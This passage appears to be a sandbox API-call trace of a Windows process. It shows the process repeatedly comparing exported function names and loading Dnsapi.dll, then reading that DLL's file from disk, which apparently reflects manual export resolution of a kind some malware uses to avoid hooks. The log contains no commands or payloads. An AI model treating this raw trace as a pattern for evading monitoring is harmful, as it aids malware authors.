lpString2="CertAddRefServerOcspResponseContext") returned 1 [0103.351] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddSerializedElementToStore") returned 1 [0103.351] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddStoreToCollection") returned 0 [0103.351] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLContextToStore") returned 1 [0103.351] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLLinkToStore") returned 1 [0103.351] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLContextToStore") returned 1 [0103.351] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLLinkToStore") returned 1 [0103.351] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateContextToStore") returned 1 [0103.351] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateLinkToStore") returned 1 [0103.351] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCRLToStore") returned 1 [0103.351] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCTLToStore") returned 1 [0103.351] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToStore") returned 1 [0103.351] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0103.351] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0103.351] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0103.351] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponse") returned 1 [0103.351] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0103.351] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddSerializedElementToStore") returned 1 [0103.351] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddStoreToCollection") returned 1 [0103.351] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAlgIdToOID") returned 0 [0103.351] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0103.351] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0103.351] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0103.351] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0103.352] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0103.352] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0103.352] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0103.352] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0103.352] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0103.352] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0103.352] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0103.352] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0103.352] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 1 [0103.352] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0103.352] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddSerializedElementToStore") returned 1 [0103.352] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddStoreToCollection") returned 1 [0103.352] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAlgIdToOID") returned 1 [0103.352] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertCloseServerOcspResponse") returned 0 [0103.352] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLContextToStore") returned 1 [0103.352] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLLinkToStore") returned 1 [0103.352] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLContextToStore") returned 1 [0103.352] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLLinkToStore") returned 1 [0103.352] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateContextToStore") returned 1 [0103.352] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0103.352] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0103.352] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0103.352] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0103.352] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0103.352] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0103.353] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0103.353] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0103.353] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0103.353] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddSerializedElementToStore") returned 1 [0103.353] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddStoreToCollection") returned 1 [0103.353] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAlgIdToOID") returned 1 [0103.353] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseServerOcspResponse") returned 1 [0103.353] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseStore") returned 0 [0103.353] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLContextToStore") returned 1 [0103.353] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLLinkToStore") returned 1 [0103.353] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLContextToStore") returned 1 [0103.353] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLLinkToStore") returned 1 [0103.353] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateContextToStore") returned 1 [0103.353] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateLinkToStore") returned 1 [0103.353] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCRLToStore") returned 1 [0103.353] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCTLToStore") returned 1 [0103.353] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToStore") returned 1 [0103.353] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0103.353] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0103.353] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0103.353] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponse") returned 1 [0103.353] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0103.353] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddSerializedElementToStore") returned 1 [0103.353] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddStoreToCollection") returned 1 [0103.353] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAlgIdToOID") returned 1 [0103.353] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseServerOcspResponse") returned 1 [0103.353] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseStore") returned 1 [0103.353] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCompareCertificate") returned 0 [0103.354] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLContextToStore") returned 1 [0103.354] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLLinkToStore") returned 1 [0103.354] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLContextToStore") returned 1 [0103.354] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLLinkToStore") returned 1 [0103.354] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateContextToStore") returned 1 [0103.354] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateLinkToStore") returned 1 [0103.354] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCRLToStore") returned 1 [0103.354] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCTLToStore") returned 1 [0103.354] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToStore") returned 1 [0103.354] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0103.354] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0103.354] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0103.354] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponse") returned 1 [0103.354] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0103.354] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddSerializedElementToStore") returned 1 [0103.354] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddStoreToCollection") returned 1 [0103.354] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAlgIdToOID") returned 1 [0103.354] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseServerOcspResponse") returned 1 [0103.354] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseStore") returned 1 [0103.354] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificate") returned 1 [0103.354] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificateName") returned 0 [0103.354] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLContextToStore") returned 1 [0103.354] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLLinkToStore") returned 1 [0103.354] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLContextToStore") returned 1 [0103.354] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLLinkToStore") returned 1 [0103.354] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateContextToStore") returned 1 [0103.354] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateLinkToStore") returned 1 [0103.354] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCRLToStore") returned 1 [0103.354] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCTLToStore") returned 1 [0103.354] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToStore") returned 1 [0103.354] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0103.354] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0103.354] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0103.354] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponse") returned 1 [0103.355] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0103.355] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddSerializedElementToStore") returned 1 [0103.355] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddStoreToCollection") returned 1 [0103.355] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAlgIdToOID") returned 1 [0103.355] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertCloseServerOcspResponse") returned 1 [0103.364] GetProcessHeap () returned 0x5b0000 [0103.364] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x40e4040 | out: hHeap=0x5b0000) returned 1 [0103.616] GetProcessHeap () returned 0x5b0000 [0103.616] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5c90c0 [0103.617] LoadLibraryA (lpLibFileName="Dnsapi.dll") returned 0x7ffc5a8a0000 [0103.629] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0103.629] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0103.629] GetModuleFileNameA (in: hModule=0x7ffc5a8a0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")) returned 0x1e [0103.629] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0103.629] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0103.630] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0103.630] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=686984) returned 1 [0103.630] GetProcessHeap () returned 0x5b0000 [0103.630] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xa7b88) returned 0x3a5d010 [0103.631] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0103.631] ReadFile (in: hFile=0x17c, lpBuffer=0x3a5d010, nNumberOfBytesToRead=0xa7b88, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x3a5d010*, lpNumberOfBytesRead=0x14f5a4*=0xa7b88, lpOverlapped=0x0) returned 1 [0103.643] CloseHandle (hObject=0x17c) returned 1 [0103.643] lstrcmpA (lpString1="AdaptiveTimeout_ClearInterfaceSpecificConfiguration", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 0 [0103.644] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0103.644] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 0 [0103.644] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0103.644] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0103.644] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 0 [0103.644] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0103.644] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0103.644] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AddRefQueryBlobEx") returned 1 [0103.644] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="BreakRecordsIntoBlob") returned 0 [0103.644] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0103.644] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0103.644] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AddRefQueryBlobEx") returned 1 [0103.644] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="BreakRecordsIntoBlob") returned 1 [0103.644] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="Coalesce_UpdateNetVersion") returned 0 [0103.644] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0103.644] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0103.644] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AddRefQueryBlobEx") returned 1 [0103.644] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="BreakRecordsIntoBlob") returned 1 [0103.644] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="Coalesce_UpdateNetVersion") returned 1 [0103.645] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="CombineRecordsInBlob") returned 0 [0103.645] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0103.645] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0103.645] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 1 [0103.645] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="BreakRecordsIntoBlob") returned 1 [0103.645] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0103.645] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="CombineRecordsInBlob") returned 1 [0103.645] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="DeRefQueryBlobEx") returned 0 [0103.645] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0103.645] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0103.645] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AddRefQueryBlobEx") returned 1 [0103.645] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="BreakRecordsIntoBlob") returned 1 [0103.645] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="Coalesce_UpdateNetVersion") returned 1 [0103.645] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="CombineRecordsInBlob") returned 1 [0103.645] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DeRefQueryBlobEx") returned -1 [0103.645] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DelaySortDAServerlist") returned 0 [0103.645] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0103.645] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0103.645] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AddRefQueryBlobEx") returned 1 [0103.645] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="BreakRecordsIntoBlob") returned 1 [0103.645] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="Coalesce_UpdateNetVersion") returned 1 [0103.645] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="CombineRecordsInBlob") returned 1 [0103.645] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DeRefQueryBlobEx") returned 1 [0103.645] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DelaySortDAServerlist") returned 1 [0103.645] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DnsAcquireContextHandle_A") returned 0 [0103.645] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0103.646] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0103.836] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AddRefQueryBlobEx") returned 1 [0103.836] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="BreakRecordsIntoBlob") returned 1 [0103.836] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="Coalesce_UpdateNetVersion") returned 1 [0103.836] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="CombineRecordsInBlob") returned 1 [0103.836] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DeRefQueryBlobEx") returned 1 [0103.836] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DelaySortDAServerlist") returned 1 [0103.836] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_A") returned 1 [0103.836] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_W") returned 0 [0103.836] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0103.836] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0103.836] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AddRefQueryBlobEx") returned 1 [0103.836] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="BreakRecordsIntoBlob") returned 1 [0103.836] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="Coalesce_UpdateNetVersion") returned 1 [0103.836] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="CombineRecordsInBlob") returned 1 [0103.836] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DeRefQueryBlobEx") returned 1 [0103.836] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DelaySortDAServerlist") returned 1 [0103.836] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_A") returned 1 [0103.836] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_W") returned 1 [0103.837] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAllocateRecord") returned 0 [0103.837] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0103.837] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0103.837] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AddRefQueryBlobEx") returned 1 [0103.837] lstrcmpA (lpString1="DnsApiAlloc", lpString2="BreakRecordsIntoBlob") returned 1 [0103.837] lstrcmpA (lpString1="DnsApiAlloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0103.837] lstrcmpA (lpString1="DnsApiAlloc", lpString2="CombineRecordsInBlob") returned 1 [0103.837] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DeRefQueryBlobEx") returned 1 [0103.837] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DelaySortDAServerlist") returned 1 [0103.837] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0103.837] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_W") returned 1 [0103.837] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAllocateRecord") returned 1 [0103.837] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsApiAlloc") returned 0 [0103.837] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0103.837] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0103.837] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AddRefQueryBlobEx") returned 1 [0103.837] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="BreakRecordsIntoBlob") returned 1 [0103.837] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="Coalesce_UpdateNetVersion") returned 1 [0103.837] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="CombineRecordsInBlob") returned 1 [0103.837] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DeRefQueryBlobEx") returned 1 [0103.837] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DelaySortDAServerlist") returned 1 [0103.837] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_A") returned 1 [0103.837] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_W") returned 1 [0103.837] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAllocateRecord") returned 1 [0103.837] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAlloc") returned 1 [0103.838] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAllocZero") returned 0 [0103.838] lstrcmpA (lpString1="DnsApiFree", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0103.838] lstrcmpA (lpString1="DnsApiFree", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0103.838] lstrcmpA (lpString1="DnsApiFree", lpString2="AddRefQueryBlobEx") returned 1 [0103.838] lstrcmpA (lpString1="DnsApiFree", lpString2="BreakRecordsIntoBlob") returned 1 [0103.838] lstrcmpA (lpString1="DnsApiFree", lpString2="Coalesce_UpdateNetVersion") returned 1 [0103.838] lstrcmpA (lpString1="DnsApiFree", lpString2="CombineRecordsInBlob") returned 1 [0103.838] lstrcmpA (lpString1="DnsApiFree", lpString2="DeRefQueryBlobEx") returned 1 [0103.838] lstrcmpA (lpString1="DnsApiFree", lpString2="DelaySortDAServerlist") returned 1 [0103.838] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_A") returned 1 [0103.838] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_W") returned 1 [0103.838] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAllocateRecord") returned 1 [0103.838] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAlloc") returned 1 [0103.838] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAllocZero") returned 1 [0103.838] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiFree") returned 0 [0103.838] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0103.838] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0103.838] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AddRefQueryBlobEx") returned 1 [0103.838] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="BreakRecordsIntoBlob") returned 1 [0103.838] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="Coalesce_UpdateNetVersion") returned 1 [0103.838] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="CombineRecordsInBlob") returned 1 [0103.838] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DeRefQueryBlobEx") returned 1 [0103.838] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DelaySortDAServerlist") returned 1 [0103.838] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_A") returned 1 [0103.838] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_W") returned 1 [0103.838] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAllocateRecord") returned 1 [0103.838] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAlloc") returned 1 [0103.838] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAllocZero") returned 1 [0103.838] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiFree") returned 1 [0103.839] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiHeapReset") returned 0 [0103.839] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0103.839] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0103.839] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AddRefQueryBlobEx") returned 1 [0103.839] lstrcmpA (lpString1="DnsApiRealloc", lpString2="BreakRecordsIntoBlob") returned 1 [0103.839] lstrcmpA (lpString1="DnsApiRealloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0103.839] lstrcmpA (lpString1="DnsApiRealloc", lpString2="CombineRecordsInBlob") returned 1 [0103.839] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DeRefQueryBlobEx") returned 1 [0103.839] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DelaySortDAServerlist") returned 1 [0103.839] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0103.839] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_W") 